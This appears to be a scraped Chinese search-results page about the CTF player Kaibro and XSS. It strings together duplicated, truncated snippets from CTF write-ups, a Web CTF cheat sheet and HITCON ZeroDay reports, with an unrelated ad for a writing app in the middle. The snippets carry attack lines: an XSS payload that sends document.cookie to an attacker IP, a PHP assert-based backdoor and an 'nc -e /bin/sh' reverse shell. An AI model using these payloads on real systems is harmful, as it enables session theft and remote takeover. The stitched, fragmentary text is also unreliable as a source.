Kaibro XSS
Web部分主要是我負責的. 其他人對這領域也幾乎不熟. 但是我平常沒啥在碰前端,因為不太喜歡javascript (X. 所以看到一堆XSS題,也是一個傻眼 ...,xss.php --> <script> window.name = "document.location='http://[my_ip]/?'+document.cookie"; window.location = "https://edu-ctf.kaibro.tw:30678/hackme.php? , 所以就塞 <iframe src="--kaibro.tw"> 之類的Payload 來讓對面Bot 送Request ... 中間我們有嘗試透過Polyglot zip+js 來去做XSS,但在成功造 ...,http://kaibro.tw:9527/news.php?id= 可以sql injection ... 登入後發現只有 http://edu.kaibro.tw:9487/teacher.php?op=s2&td=1 的td 可以sql ... [HW 0x07] XSS Kitchen. ,XSS; RPO; CSS Injection; XS-Leaks ... <?php // 無回顯後門 // e.g. ?pass=file_get_contents('http://kaibro.tw/test') ob_start('assert'); ... nc -e /bin/sh kaibro.tw 5566. , 如何快速入門Web Security; XSS, Command Injection, SQL Injection, LFI, ... 地點:逢甲大學資電234教室; 講師:kaibro; 主辦單位:經濟部工業局 ..., 詳細資料. ZDID:ZD-2017-01100; 通報者:Kaibro (K4iBr0); 風險:低; 類型:反射型跨站腳本攻擊(Reflected Cross-Site Scripting) ..., ... 原型來自Kaibro 所寫的wargame,見http://final.kaibro.tw:10002/; 註 ... 註入、XSS跨站、Webshell上傳、命令註入、非法HTTP協議請求、非 ...,詳細資料. ZDID:ZD-2017-01296; 通報者:Kaibro (K4iBr0); 風險:低; 類型:反射型跨站腳本攻擊(Reflected Cross-Site Scripting) ... , ... 同網域( edu-ctf.kaibro.tw ) 中有Reflected XSS 漏洞的頁面,這裡利用 window.name 跨域的特性所以可以夾帶我們真實的payload 來繞過filter。
相關軟體 Write! 資訊 | |
---|---|
Write! 是一個完美的地方起草一個博客文章,保持你的筆記組織,收集靈感的想法,甚至寫一本書。支持雲可以讓你在一個地方擁有所有這一切。 Write! 是最酷,最快,無憂無慮的寫作應用程序! Write! 功能:Native Cloud您的文檔始終在 Windows 和 Mac 上。設備之間不需要任何第三方應用程序之間的同步。寫入會話 將多個標籤組織成云同步的會話。跳轉會話重新打開所有文檔.快速... Write! 軟體介紹
Kaibro XSS 相關參考資料
AIS3 EOF CTF 初賽| Kaibro's blog - kaibro.tw
Web部分主要是我負責的. 其他人對這領域也幾乎不熟. 但是我平常沒啥在碰前端,因為不太喜歡javascript (X. 所以看到一堆XSS題,也是一個傻眼 ... https://blog.kaibro.tw CS 2019 Fall - Homework 0x04 - HackMD
xss.php --> <script> window.name = "document.location='http://[my_ip]/?'+document.cookie"; window.location = "https://edu-ctf.kaibro.tw:30678/hackme.php? https://hackmd.io Google CTF 2019 Final 遊記| Kaibro's blog - kaibro.tw
所以就塞 <iframe src="--kaibro.tw"> 之類的Payload 來讓對面Bot 送Request ... 中間我們有嘗試透過Polyglot zip+js 來去做XSS,但在成功造 ... https://blog.kaibro.tw HW 0x07 Write Up - HackMD
http://kaibro.tw:9527/news.php?id= 可以sql injection ... 登入後發現只有 http://edu.kaibro.tw:9487/teacher.php?op=s2&td=1 的td 可以sql ... [HW 0x07] XSS Kitchen. https://hackmd.io Web CTF CheatSheet - GitHub
XSS; RPO; CSS Injection; XS-Leaks ... <?php // 無回顯後門 // e.g. ?pass=file_get_contents('http://kaibro.tw/test') ob_start('assert'); ... nc -e /bin/sh kaibro.tw 5566. https://github.com Web進階 - HackerSir 逢甲大學黑客社 - KKTIX
如何快速入門Web Security; XSS, Command Injection, SQL Injection, LFI, ... 地點:逢甲大學資電234教室; 講師:kaibro; 主辦單位:經濟部工業局 ... https://hackersir.kktix.cc 中山大學收款系統reflected XSS - HITCON ZeroDay
詳細資料. ZDID:ZD-2017-01100; 通報者:Kaibro (K4iBr0); 風險:低; 類型:反射型跨站腳本攻擊(Reflected Cross-Site Scripting) ... https://zeroday.hitcon.org 命令註入新玩法:巧借環境攻擊目標- IT閱讀 - ITREAD01.COM
... 原型來自Kaibro 所寫的wargame,見http://final.kaibro.tw:10002/; 註 ... 註入、XSS跨站、Webshell上傳、命令註入、非法HTTP協議請求、非 ... https://www.itread01.com 大碩補習班Reflected XSS - HITCON ZeroDay
詳細資料. ZDID:ZD-2017-01296; 通報者:Kaibro (K4iBr0); 風險:低; 類型:反射型跨站腳本攻擊(Reflected Cross-Site Scripting) ... https://zeroday.hitcon.org 程式安全::HW4 Write-up · NiNi's Den
... 同網域( edu-ctf.kaibro.tw ) 中有Reflected XSS 漏洞的頁面,這裡利用 window.name 跨域的特性所以可以夾帶我們真實的payload 來繞過filter。 http://blog.terrynini.tw |